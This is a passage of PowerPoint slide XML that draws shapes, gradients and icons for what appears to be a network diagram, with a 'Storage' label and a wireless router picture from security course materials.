                        <a:pt x="85" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="74"/>
                        <a:pt x="87" y="70"/>
                        <a:pt x="89" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="91" y="69"/>
                        <a:pt x="136" y="57"/>
                        <a:pt x="141" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="153" y="52"/>
                        <a:pt x="159" y="47"/>
                        <a:pt x="159" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="159" y="8"/>
                        <a:pt x="159" y="8"/>
                        <a:pt x="159" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="159" y="7"/>
                        <a:pt x="159" y="7"/>
                        <a:pt x="159" y="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4074"/>
                    </a:gs>
                    <a:gs pos="50000">
                      <a:srgbClr val="004074">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="004074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3" name="Oval 1158"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="3025" y="1560"/>
                  <a:ext cx="52" cy="52"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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Freeform 1159"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3038" y="1626"/>
                  <a:ext cx="16" cy="76"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 55"/>
                    <a:gd name="T1" fmla="*/ 0 h 265"/>
                    <a:gd name="T2" fmla="*/ 14 w 55"/>
                    <a:gd name="T3" fmla="*/ 22 h 265"/>
                    <a:gd name="T4" fmla="*/ 5 w 55"/>
                    <a:gd name="T5" fmla="*/ 239 h 265"/>
                    <a:gd name="T6" fmla="*/ 29 w 55"/>
                    <a:gd name="T7" fmla="*/ 265 h 265"/>
                    <a:gd name="T8" fmla="*/ 52 w 55"/>
                    <a:gd name="T9" fmla="*/ 253 h 265"/>
                    <a:gd name="T10" fmla="*/ 38 w 55"/>
                    <a:gd name="T11" fmla="*/ 29 h 265"/>
                    <a:gd name="T12" fmla="*/ 55 w 55"/>
                    <a:gd name="T13" fmla="*/ 15 h 265"/>
                    <a:gd name="T14" fmla="*/ 0 w 55"/>
                    <a:gd name="T15" fmla="*/ 0 h 2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5" h="265">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="14" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="239"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="29" y="265"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="52" y="253"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="38" y="29"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5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40505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6350" cap="flat" cmpd="sng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Freeform 1160"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3035" y="1683"/>
                  <a:ext cx="59" cy="35"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 75 w 91"/>
                    <a:gd name="T1" fmla="*/ 0 h 54"/>
                    <a:gd name="T2" fmla="*/ 28 w 91"/>
                    <a:gd name="T3" fmla="*/ 14 h 54"/>
                    <a:gd name="T4" fmla="*/ 40 w 91"/>
                    <a:gd name="T5" fmla="*/ 46 h 54"/>
                    <a:gd name="T6" fmla="*/ 91 w 91"/>
                    <a:gd name="T7" fmla="*/ 32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1" h="54">
                      <a:moveTo>
                        <a:pt x="75" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="61" y="4"/>
                        <a:pt x="45" y="8"/>
                        <a:pt x="28" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="22"/>
                        <a:pt x="17" y="54"/>
                        <a:pt x="40" y="46"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="44"/>
                        <a:pt x="66" y="38"/>
                        <a:pt x="91" y="32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50000">
                      <a:srgbClr val="FFFFFF">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFFFFF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98" name="Group 1161"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2724" y="1660"/>
                <a:ext cx="429" cy="228"/>
                <a:chOff x="786" y="2382"/>
                <a:chExt cx="1190" cy="634"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1008" name="Freeform 1162"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1933" y="2464"/>
                  <a:ext cx="43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09" name="Freeform 1163"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1888" y="2464"/>
                  <a:ext cx="45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0" name="Freeform 1164"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1038" y="2694"/>
                  <a:ext cx="46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4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1" name="Freeform 1165"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1084" y="2694"/>
                  <a:ext cx="42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2" name="Freeform 1166"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="786" y="2625"/>
                  <a:ext cx="45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Freeform 1167"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="831" y="2625"/>
                  <a:ext cx="43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Freeform 1168"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1633" y="2382"/>
                  <a:ext cx="42" cy="325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5" name="Freeform 1169"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1633" y="2394"/>
                  <a:ext cx="42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4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6" name="Freeform 1170"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1675" y="2394"/>
                  <a:ext cx="46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7" name="Freeform 1171"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="786" y="2382"/>
                  <a:ext cx="1190" cy="325"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 321"/>
                    <a:gd name="T1" fmla="*/ 65 h 87"/>
                    <a:gd name="T2" fmla="*/ 160 w 321"/>
                    <a:gd name="T3" fmla="*/ 22 h 87"/>
                    <a:gd name="T4" fmla="*/ 160 w 321"/>
                    <a:gd name="T5" fmla="*/ 22 h 87"/>
                    <a:gd name="T6" fmla="*/ 240 w 321"/>
                    <a:gd name="T7" fmla="*/ 0 h 87"/>
                    <a:gd name="T8" fmla="*/ 321 w 321"/>
                    <a:gd name="T9" fmla="*/ 22 h 87"/>
                    <a:gd name="T10" fmla="*/ 240 w 321"/>
                    <a:gd name="T11" fmla="*/ 44 h 87"/>
                    <a:gd name="T12" fmla="*/ 240 w 321"/>
                    <a:gd name="T13" fmla="*/ 44 h 87"/>
                    <a:gd name="T14" fmla="*/ 81 w 321"/>
                    <a:gd name="T15" fmla="*/ 87 h 87"/>
                    <a:gd name="T16" fmla="*/ 0 w 321"/>
                    <a:gd name="T17" fmla="*/ 6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21" h="87">
                      <a:moveTo>
                        <a:pt x="0" y="65"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="160" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="160" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="240" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="321" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="240" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="240" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="81" y="87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8E47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8" name="Freeform 1172"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1084" y="2464"/>
                  <a:ext cx="892" cy="285"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 241"/>
                    <a:gd name="T1" fmla="*/ 65 h 77"/>
                    <a:gd name="T2" fmla="*/ 0 w 241"/>
                    <a:gd name="T3" fmla="*/ 77 h 77"/>
                    <a:gd name="T4" fmla="*/ 241 w 241"/>
                    <a:gd name="T5" fmla="*/ 12 h 77"/>
                    <a:gd name="T6" fmla="*/ 241 w 241"/>
                    <a:gd name="T7" fmla="*/ 0 h 77"/>
                    <a:gd name="T8" fmla="*/ 0 w 241"/>
                    <a:gd name="T9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1" h="77">
                      <a:moveTo>
                        <a:pt x="0" y="65"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241" y="12"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241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9" name="Freeform 1173"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="786" y="2625"/>
                  <a:ext cx="298" cy="124"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 80"/>
                    <a:gd name="T1" fmla="*/ 0 h 34"/>
                    <a:gd name="T2" fmla="*/ 0 w 80"/>
                    <a:gd name="T3" fmla="*/ 13 h 34"/>
                    <a:gd name="T4" fmla="*/ 80 w 80"/>
                    <a:gd name="T5" fmla="*/ 34 h 34"/>
                    <a:gd name="T6" fmla="*/ 80 w 80"/>
                    <a:gd name="T7" fmla="*/ 22 h 34"/>
                    <a:gd name="T8" fmla="*/ 0 w 80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0" h="34">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="13"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="80" y="34"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="80" y="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99" name="Freeform 1174"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2932" y="1717"/>
                <a:ext cx="158" cy="42"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 668 w 668"/>
                  <a:gd name="T1" fmla="*/ 76 h 177"/>
                  <a:gd name="T2" fmla="*/ 377 w 668"/>
                  <a:gd name="T3" fmla="*/ 0 h 177"/>
                  <a:gd name="T4" fmla="*/ 0 w 668"/>
                  <a:gd name="T5" fmla="*/ 102 h 177"/>
                  <a:gd name="T6" fmla="*/ 288 w 668"/>
                  <a:gd name="T7" fmla="*/ 177 h 177"/>
                  <a:gd name="T8" fmla="*/ 668 w 668"/>
                  <a:gd name="T9" fmla="*/ 76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8" h="177">
                    <a:moveTo>
                      <a:pt x="668" y="76"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="377" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="668" y="7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000" name="Group 1175"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2844" y="1636"/>
                <a:ext cx="134" cy="89"/>
                <a:chOff x="1859" y="2279"/>
                <a:chExt cx="372" cy="247"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1001" name="Freeform 1176"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1859" y="2412"/>
                  <a:ext cx="372" cy="100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 25173"/>
                    <a:gd name="T1" fmla="*/ 3378 h 6756"/>
                    <a:gd name="T2" fmla="*/ 12585 w 25173"/>
                    <a:gd name="T3" fmla="*/ 0 h 6756"/>
                    <a:gd name="T4" fmla="*/ 25173 w 25173"/>
                    <a:gd name="T5" fmla="*/ 3378 h 6756"/>
                    <a:gd name="T6" fmla="*/ 12585 w 25173"/>
                    <a:gd name="T7" fmla="*/ 6756 h 6756"/>
                    <a:gd name="T8" fmla="*/ 0 w 25173"/>
                    <a:gd name="T9" fmla="*/ 3378 h 67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173" h="6756">
                      <a:moveTo>
                        <a:pt x="0" y="3378"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="12585" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25173" y="3378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="6756"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="3378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02" name="Freeform 1177"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2045" y="2462"/>
                  <a:ext cx="186" cy="64"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 12588"/>
                    <a:gd name="T1" fmla="*/ 3378 h 4342"/>
                    <a:gd name="T2" fmla="*/ 0 w 12588"/>
                    <a:gd name="T3" fmla="*/ 4342 h 4342"/>
                    <a:gd name="T4" fmla="*/ 12588 w 12588"/>
                    <a:gd name="T5" fmla="*/ 964 h 4342"/>
                    <a:gd name="T6" fmla="*/ 12588 w 12588"/>
                    <a:gd name="T7" fmla="*/ 0 h 4342"/>
                    <a:gd name="T8" fmla="*/ 0 w 12588"/>
                    <a:gd name="T9" fmla="*/ 3378 h 43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588" h="4342">
                      <a:moveTo>
                        <a:pt x="0" y="3378"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="4342"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12588" y="964"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12588" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="3378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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="80808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03" name="Freeform 1178"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1859" y="2462"/>
                  <a:ext cx="186" cy="64"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T1" fmla="*/ 4342 h 4342"/>
                    <a:gd name="T2" fmla="*/ 0 w 12585"/>
                    <a:gd name="T3" fmla="*/ 964 h 4342"/>
                    <a:gd name="T4" fmla="*/ 0 w 12585"/>
                    <a:gd name="T5" fmla="*/ 0 h 4342"/>
                    <a:gd name="T6" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T7" fmla="*/ 3378 h 4342"/>
                    <a:gd name="T8" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T9" fmla="*/ 4342 h 43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585" h="4342">
                      <a:moveTo>
                        <a:pt x="12585" y="4342"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="964"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="3378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="43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Freeform 1179"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1912" y="2428"/>
                  <a:ext cx="252" cy="68"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 17020"/>
                    <a:gd name="T1" fmla="*/ 1711 h 4567"/>
                    <a:gd name="T2" fmla="*/ 10647 w 17020"/>
                    <a:gd name="T3" fmla="*/ 4567 h 4567"/>
                    <a:gd name="T4" fmla="*/ 17020 w 17020"/>
                    <a:gd name="T5" fmla="*/ 2859 h 4567"/>
                    <a:gd name="T6" fmla="*/ 6371 w 17020"/>
                    <a:gd name="T7" fmla="*/ 0 h 4567"/>
                    <a:gd name="T8" fmla="*/ 0 w 17020"/>
                    <a:gd name="T9" fmla="*/ 1711 h 45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020" h="4567">
                      <a:moveTo>
                        <a:pt x="0" y="1711"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="10647" y="4567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17020" y="2859"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6371" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1711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Freeform 1180"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1859" y="2283"/>
                  <a:ext cx="186" cy="243"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 12585"/>
                    <a:gd name="T1" fmla="*/ 0 h 16411"/>
                    <a:gd name="T2" fmla="*/ 0 w 12585"/>
                    <a:gd name="T3" fmla="*/ 13033 h 16411"/>
                    <a:gd name="T4" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T5" fmla="*/ 16411 h 16411"/>
                    <a:gd name="T6" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T7" fmla="*/ 3378 h 16411"/>
                    <a:gd name="T8" fmla="*/ 0 w 12585"/>
                    <a:gd name="T9" fmla="*/ 0 h 16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585" h="16411">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="13033"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="16411"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="337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06" name="Freeform 1181"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2045" y="2329"/>
                  <a:ext cx="14" cy="197"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 971"/>
                    <a:gd name="T1" fmla="*/ 13293 h 13293"/>
                    <a:gd name="T2" fmla="*/ 971 w 971"/>
                    <a:gd name="T3" fmla="*/ 13030 h 13293"/>
                    <a:gd name="T4" fmla="*/ 971 w 971"/>
                    <a:gd name="T5" fmla="*/ 0 h 13293"/>
                    <a:gd name="T6" fmla="*/ 0 w 971"/>
                    <a:gd name="T7" fmla="*/ 260 h 13293"/>
                    <a:gd name="T8" fmla="*/ 0 w 971"/>
                    <a:gd name="T9" fmla="*/ 13293 h 132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71" h="13293">
                      <a:moveTo>
                        <a:pt x="0" y="13293"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="971" y="13030"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="971" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="260"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="13293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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="80808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182"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1859" y="2279"/>
                  <a:ext cx="200" cy="54"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 13556 w 13556"/>
                    <a:gd name="T1" fmla="*/ 3378 h 3638"/>
                    <a:gd name="T2" fmla="*/ 12585 w 13556"/>
                    <a:gd name="T3" fmla="*/ 3638 h 3638"/>
                    <a:gd name="T4" fmla="*/ 0 w 13556"/>
                    <a:gd name="T5" fmla="*/ 260 h 3638"/>
                    <a:gd name="T6" fmla="*/ 971 w 13556"/>
                    <a:gd name="T7" fmla="*/ 0 h 3638"/>
                    <a:gd name="T8" fmla="*/ 13556 w 13556"/>
                    <a:gd name="T9" fmla="*/ 3378 h 36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56" h="3638">
                      <a:moveTo>
                        <a:pt x="13556" y="3378"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="12585" y="3638"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="260"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="971" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13556" y="3378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026" name="Rectangle 1025"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10193719" y="2829671"/>
              <a:ext cx="667042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Storage</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1027" name="Group 1026"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5275684" y="1339716"/>
              <a:ext cx="2556485" cy="2552682"/>
              <a:chOff x="15546" y="790136"/>
              <a:chExt cx="2422854" cy="2419249"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1028" name="Oval 7"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="15546" y="790136"/>
                <a:ext cx="2422854" cy="2419249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29" name="Oval 8"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="174661" y="949014"/>
                <a:ext cx="2104624" cy="210149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0" name="Oval 9"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="342017" y="1116120"/>
                <a:ext cx="1769913" cy="176728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1" name="Oval 10"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="509372" y="1283227"/>
                <a:ext cx="1435202" cy="1433066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2" name="Oval 11"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="676728" y="1450334"/>
                <a:ext cx="1100490" cy="109885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3" name="Oval 10"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="860668" y="1634000"/>
                <a:ext cx="732610" cy="73152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4" name="Oval 10"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="1043821" y="1816880"/>
                <a:ext cx="366305" cy="36576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226" name="Freeform 1305"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="977535" y="4848721"/>
              <a:ext cx="3064905" cy="825168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CACACA"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="B2B2B2"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gradFill>
            <a:ln w="19050" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd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7" name="Freeform 1310"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="1298172" y="4935954"/>
              <a:ext cx="2423633" cy="653063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noFill/>
            <a:ln w="38100" algn="ctr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ACAC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25400" dir="54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pic>
          <p:nvPicPr>
            <p:cNvPr id="228" name="Picture 13" descr="Y:\CEH v7 - Haja\Icon Shock\CLEAN\Networking\wireless_router_256.png"/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66637" y="4854094"/>
              <a:ext cx="651323" cy="65132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34" name="Group 233"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1720874" y="3847427"/>
              <a:ext cx="2556485" cy="2552682"/>
              <a:chOff x="15546" y="790136"/>
              <a:chExt cx="2422854" cy="2419249"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="235" name="Oval 7"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="15546" y="790136"/>
                <a:ext cx="2422854" cy="2419249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36" name="Oval 8"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="174661" y="949014"/>
                <a:ext cx="2104624" cy="210149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37" name="Oval 9"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="342017" y="1116120"/>
                <a:ext cx="1769913" cy="176728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38" name="Oval 10"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="509372" y="1283227"/>
                <a:ext cx="1435202" cy="1433066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39" name="Oval 11"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="676728" y="1450334"/>
                <a:ext cx="1100490" cy="109885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0" name="Oval 10"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
